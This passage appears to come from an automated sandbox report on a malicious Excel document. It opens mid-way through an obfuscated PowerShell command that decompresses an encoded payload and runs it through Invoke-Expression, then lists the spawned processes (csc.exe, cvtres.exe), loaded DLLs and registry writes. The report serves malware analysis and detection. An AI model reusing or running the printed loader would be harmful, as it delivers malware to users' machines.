DAeBPG43vGSUTyp+C'${P1LJ}'Yb8U0AO'${P1LJ}'pobXQlFYAQZrk7VZCBRx'${P1LJ}'0iKx2qmtGkAJ0mWIHrMo5mCtHPIzRU'${P1LJ}'WB02tamqyBYxBguYwAKG3ODN1FzokGE4G+Na/Lco0TyoaZHEzNYucVD'${P1LJ}'UMjO26uW0kHU'${P1LJ}'K'${P1LJ}'dqLrYJrRtIo2IiY3AjXAw/tYkxoEQbJXMjzOR8cJGvoFXdaFskKgqRtSzQkLG5H'${P1LJ}'EbIbAuWxUgH+SxcIS7/D569BXmIC1mEmXFXUyS0CJhOyOMk0a2mUTrxlw4hK7GzDOwzVTV8HPqs1SvvEB'${P1LJ}'4PndanggOs'${P1LJ}'dgNb60HSGCzUsegUaz606Qvk'${P1LJ}'+16eAuhhiWuLbN7azlTHWtE1f2uLKO43ClerRp4ealzUtpbIspzjStfj60rc1HaXtJV+lbLHJe'${P1LJ}'n'${P1LJ}'v0HgRjbVAhcB/HEnufjty3TDa1YcPRbameULFZ18eWW5wyzzNL82ut+OvJRx9kVg+S'${P1LJ}'o7F1rrvkFVSHMjc0aIpUA62v8Z0rCfGEvjuad4Dg'${P1LJ}'YQF5FElH0sCLG7hlsIjAck7GuVo7ONcdHiiRxCxGg26eSh'${P1LJ}'GwzhWpfg95fIaSOo7'${P1LJ}'n8fGN0icbm/Afpb1Rk+zTIu1Jw'${P1LJ}'+nzi')) ${P1LJ}[iO.cOMPReSSion.coMPrESSioNMODe]::deCOmpReSs ) |.('%'){ &('t') Io.StReamREaDer( `$_${P1LJ} [TexT.eNCODINg]::AScii)}|&('%'){ `$_.READtoeND( )} )"\" | . ( $PShOme[4]+$PshOME[30]+'X')
Path
C:\Windows\System32\WindowsPowerShell\v1.0\POWershelL.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.jscript\b3fde69f9642ab464bd3389f1fe3c5bd\microsoft.jscript.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\security.dll
c:\windows\system32\credssp.dll
c:\windows\system32\schannel.dll
c:\windows\microsoft.net\framework\v2.0.50727\diasymreader.dll
c:\windows\system32\netutils.dll

PID
2356
CMD
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\pnefnq9q.cmdline"
Path
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
Indicators
Parent process
POWershelL.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Visual C# Command Line Compiler
Version
8.0.50727.4927 (NetFXspW7.050727-4900)
Modules
Image
c:\windows\microsoft.net\framework\v2.0.50727\csc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shlwapi.dll
c:\windows\microsoft.net\framework\v2.0.50727\cscomp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\psapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework\v2.0.50727\alink.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorpe.dll
c:\windows\microsoft.net\framework\v2.0.50727\diasymreader.dll
c:\windows\system32\apphelp.dll

PID
3364
CMD
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESD23D.tmp" "c:\Users\admin\AppData\Local\Temp\CSCD23C.tmp"
Path
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
Indicators
No indicators
Parent process
csc.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft® Resource File To COFF Object Conversion Utility
Version
8.00.50727.4940 (Win7SP1.050727-5400)
Modules
Image
c:\windows\microsoft.net\framework\v2.0.50727\cvtres.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptbase.dll

Registry activity

Total events
2510
Read events
1686
Write events
795
Delete events
29

Modification events

PID
Process
Operation
Key
Name
Value
3360
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
3360
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency
3360
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\11F422
3360
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery
3360
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\11F683
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
hi
68692000200D0000010000000000000000000000
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
200D0000A852BB8FF420D50100000000
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\11F422
11F422
04000000200D00003F00000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C0064006F0063003400380033002000640065006C00200030003400200047006900750067006E006F0020005F00530072006C002E0078006C007300000000002200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C000100000000000000D0607491F420D50122F4110022F4110000000000AC020000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\11F422
11F422
04000000200D00003F00000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C0064006F0063003400380033002000640065006C00200030003400200047006900750067006E006F0020005F00530072006C002E0078006C007300000000002200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C000100000000000000D0607491F420D50122F4110022F4110000000000AC020000001800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
3360
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
EXCELFiles
1321992215
3360
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1321992336
3360
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1321992196
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{64CAEE4C-BD0E-4701-B0DA-710F89BCB4BD}
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\11F422
11F422
04000000200D00003F00000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C0064006F0063003400380033002000640065006C00200030003400200047006900750067006E006F0020005F00530072006C002E0078006C007300000000002200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C000100000000000000D0607491F420D50122F4110022F4110000000000AC020000001800000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\11F683
11F683
04000000200D00003F00000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C0064006F0063003400380033002000640065006C00200030003400200047006900750067006E006F0020005F00530072006C002E0078006C007300000000002200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C000100000001000000D83FA88FF420D50183F6110083F6110000000000AC0200006E0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
25
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU
Max Display
25
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
538F6C892AD540068154C6670774E980
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
3360
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1321992337
3360
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1321992338
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTF
74
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTA
74
1432
POWershelL.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
764
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
764
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409
764
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
LocaleName
it-IT
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iCalendarType
1
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
s1159
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
s2359
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sTimeFormat
HH:mm:ss
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iTime
1
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iTLZero
1
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iTimePrefix
0
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sTime
:
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sShortDate
dd/MM/yyyy
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iDate
1
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sDate
/
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sLongDate
dddd d MMMM yyyy
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sYearMonth
MMMM yyyy
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sCurrency
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iCurrency
2
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iNegCurr
9
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iCurrDigits
2
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sDecimal
,
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sMonDecimalSep
,
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sThousand
.
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sMonThousandSep
.
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sList
;
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iDigits
2
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iLZero
1
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iNegNumber
1
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sNativeDigits
0123456789
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
NumShape
1
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iMeasure
0
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iFirstDayOfWeek
0
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iFirstWeekOfYear
2
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sGrouping
3;0
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sMonGrouping
3;0
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sPositiveSign
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sNegativeSign
-
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iPaperSize
9
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sShortTime
HH:mm
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sLanguage
ITA
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sCountry
Italy
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iCountry
39
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5084
Arabic (101)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5053
Bulgarian (Typewriter)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5065
Chinese (Traditional) - US Keyboard
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5031
Czech
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5007
Danish
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5011
German
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5046
Greek
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5000
US
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5020
Spanish
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5009
Finnish
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5010
French
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5083
Hebrew
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5033
Hungarian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5013
Icelandic
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5015
Italian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5061
Japanese
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5063
Korean
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5008
Dutch
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5018
Norwegian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5035
Polish (Programmers)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5003
Portuguese (Brazilian ABNT)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5037
Romanian (Legacy)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5055
Russian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5030
Croatian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5039
Slovak
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5029
Albanian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5022
Swedish
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5079
Thai Kedmanee
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5060
Turkish Q
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5129
Urdu
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5058
Ukrainian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5052
Belarusian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5041
Slovenian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5042
Estonian
764
